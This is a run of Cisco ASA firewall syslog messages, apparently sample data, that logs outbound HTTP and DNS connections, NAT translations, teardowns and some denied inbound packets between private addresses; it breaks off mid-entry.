12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 
2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 
(172.31.98.44/1453) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) 
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built 
outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to 
inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src 
outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs +Oct 10 
2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP 
connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for 
outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP 
connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: 
Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP 
translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built 